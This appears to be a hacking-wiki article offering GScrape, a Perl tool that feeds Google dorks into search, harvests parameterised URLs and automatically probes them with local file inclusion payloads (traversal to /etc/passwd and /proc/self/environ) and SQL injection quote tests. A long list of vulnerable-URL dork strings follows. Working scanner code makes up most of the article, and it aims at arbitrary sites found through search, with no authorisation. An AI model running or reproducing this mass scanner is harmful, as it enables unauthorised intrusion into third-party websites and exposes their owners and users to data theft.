Special thanks to Trep for his contributions to this article.
- Main article: Web exploitation tools
The purpose of this script is to demonstrate that one can easily create simple tools to do tedious tasks. This script requires the Google::Search perl module.
- You can install Google::Search using CPAN:
Terminal |
localhost:~ $ cpan -i Google::Search |
GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms, query google with those search terms and retrieve an array of websites,
which are then tested for Local File Inclusion and SQL injection vulnerabilities, if any are found they are logged to the output file specified by the user.
perl -f dork.lst -o gscrape.log
GScrape will not return any results unless your input file actually contains a list of search terms. |
#!/usr/bin/perl # # # Uses Google::Search to either iterate through a list of dorks (dorks.lst) # And then prints out a list of vulnerable sites. use Term::ANSIColor; use Getopt::Std; use HTTP::Request; use Google::Search; use LWP::UserAgent; #vars n stuff my $search; my $useragent = LWP::UserAgent->new(); my $infile; my $outfile; my $searchmode; my @url_list; my @search_terms; #search terms and my @dorks; #dorks, to check if the terms have "inurl:". my @vulnsites; ##--main execution: &banner(); &getOpts(); if ($opt{s} || $opt{f} && $opt{o} && !$opt{h}) { &printInfo("Trying with the following settings:"); &printInfo( ">>Search Mode: $searchmode"); &printInfo( ">>Output file: $outfile"); if ($searchmode == "single" && $searchmode != "list"){ &printInfo( ">>Search Term: $search"); &search_single(); } else { &printInfo( ">>Search List: $infile"); &search_list(); } } if (!$opt{h} && !$opt{o}){ &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!"); &printInfo("use -h flag for help"); print"\n\r\nExiting..\n"; } ##--subroutines:. #Search using a list of terms: sub search_list(){ open FILE, "<", $infile or die $!; my @search_terms = <FILE>; my $num = @search_terms; &printInfo("Loaded $num search terms."); &printInfo("Fixing improper search terms [if any]"); #iterate through the search terms, checking if they have "inurl:" if not, prepend it. for( my $int = 0; $int < $num; $int++){ my $random = int(rand($num)); if ( @search_terms[$random] !~ /inurl:/ ){ push(@dorks, "inurl:".@search_terms[$random]); } if ( @search_terms[$random] =~ /inurl:/){ push(@dorks, @search_terms[$random]); } } print"\n"; &printInfo("Retrieving search results.."); #iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites. foreach(@dorks) { $search = Google::Search->Web( query => $_ ); while ( my $result = $search->next ) { if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: push(@url_list, $result->uri); #push result into the array &printInfo(">>".$result->uri); } } } my @lfitest = ( '/etc/passwd%00', '/etc/passwd', '/proc/self/environ%00', '/proc/self/environ', '../../../../../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../etc/passwd%00', "'" ); my $lfinum = @lfitest; print"\n"; &printInfo("Testing sites for vulnerabilities.."); #Test the sites for vulns. foreach( @url_list ){ my $index = @url_list; my $randint = int(rand($index)); my $x = @url_list[$randint]; $x =~ s/=.*/=/ ; for (my $i = 0; $i < $lfinum; $i++){ if ( $x !~ /http:\/\// ){ $x = "http://".$x; } my $request = $useragent->get($x.@lfitest[$i]); my $result = $request->content; if ($result =~ m/root:x:/i || m/HTTP_USER_AGENT/){ &printVulnLFI(">>> ".$x.@lfitest[$i]); open FILE, ">>", $outfile or die $!; print FILE "[LFI VULN] >> ".$x.@lfitest[$i]."\n"; close FILE; last; } if ($result =~ m/error in your/i || m/syntax/i){ &printVulnSQLI(">>> ".$x.@lfitest[$i]); open FILE, ">>", $outfile or die $!; print FILE "[SQLI VULN] >> ".$x.@lfitest."'\n"; close FILE; last; } if ($result =~ m/hacking/i || m/reported/i || m/recorded/i || m/malicious/i){ &printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]); } } } } sub banner() { system('clear'); print("\r+=====================================================================+ \r| GScrape | \r| ________ _________ | \r| / _____/ / _____/ ________________ ______ ____ | \r| / \\ ___ \\_____ \\_/ ___\\_ __ \\__ \\ \\____ \\_/ __ \\ | \r| \\ \\_\\ \\/ \\ \\___| | \\// __ \\| |_> > ___/ | \r| \\______ /_______ /\\___ >__| (____ / __/ \\___ > | \r| \\/ \\/ \\/ \\/|__| \\/ | \r| | \r| | \r| Uses Google AJAX API to search for vulnerabilities | \r+=====================================================================+ \r \r " ); printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE. \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n"); } sub getOpts(){ #option modes, and args. my $opt_string = 'f:o:h'; getopts( "$opt_string", \%opt ); #set vars of $outfile, and $infile if they are defined. if ($opt{o}){ $outfile = $opt{o}; } if ($opt{f}){ $infile = $opt{f}; $searchmode = "list"; } #Display help page if -h usage() if $opt{h}; } #YES HELLO, THIS IS HELP PAGE. sub usage(){ print(" GScrape Usage: Search using a list of search terms: -f /path/to/dorks.txt Define output file: -o results.out Example Usages: Run a list of search terms through the scanner: perl -f ~/Dork.lst -o ~/result.out "); } #HERE BE ANSICOLOR: # [INFO] [CRITICAL] and [WARNING] messages sub printCritical(){ my $error = shift(@_); print color 'bold blue'; print "\r["; print color 'red'; print "CRITICAL"; print color 'bold blue'; print "] "; print color 'red'; print color 'reset'; print $error."\n"; } sub printWarning(){ my $error = shift(@_); print color 'bold blue'; print "\r["; print color 'yellow'; print "WARNING"; print color 'bold blue'; print "] "; print color 'reset'; print $error."\n"; } sub printInfo(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'reset'; print "INFO"; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } sub printVulnLFI(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'green'; print "LFI VULN "; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } sub printVulnSQLI(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'green'; print "SQLI VULN"; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } |
Search Terms
These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities.. but they probably will, with that said you are responsible for what you do with what you find using this tool.
Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there. |
- .php?*=
- inurl:index.php?page=
- inurl:include.php?*=
- index.php?include=
- inurl:index.php?nic=
- inurl:index.php?sec=
- inurl:index.php?content=
- inurl:index.php?link=
- inurl:index.php?filename=
- inurl:index.php?dir=
- inurl:index.php?document=
- inurl:index.php?view=
- inurl:*.php?sel=
- inurl:*.php?session=&content=
- inurl:*.php?locate=
- inurl:*.php?place=
- inurl:*.php?layout=
- inurl:*.php?go=
- inurl:*.php?catch=
- inurl:*.php?mode=
- inurl:*.php?name=
- inurl:*.php?loc=
- inurl:*.php?f=
- inurl:*.php?inf=
- inurl:*.php?pg=
- inurl:*.php?load=
- inurl:*.php?naam=
- cat.asp?cat=
- Productlist.asp?Catalogid=
- Category.asp?Category_Id=
- Category.cfm?Category_Id=
- category.asp?cid=
- category.cfm?cid=
- category.asp?cat=
- category.cfm?cat=
- category.asp?id=
- index.cfm?Pageid=
- category.asp?catid=
- Category.asp?c=
- Category.cfm?c=
- Productlist.cfm?Catalogid=
- Productlist.asp?Catalogid=
- Viewitem.asp?Catalogid=
- Viewitem.cfm?Catalogid=
- catalog.cfm?Catalogid=
- catalog.asp?Catalogid=
- department.cfm?Dept=
- department.asp?Dept=
- Itemdetails.cfm?Catalogid=
- Itemdetails.asp?Catalogid=
- index.php?id=
- trainers.php?id=
- buy.php?category=
- article.php?ID=
- play_old.php?id=
- declaration_more.php?decl_id=
- Pageid=
- games.php?id=
- page.php?file=
- newsDetail.php?id=
- gallery.php?id=
- article.php?id=
- show.php?id=
- staff_id=
- newsitem.php?num=
- readnews.php?id=
- top10.php?cat=
- historialeer.php?num=
- reagir.php?num=
- Download URL:
GScrape Visit the Web Exploitation Portal for complete coverage.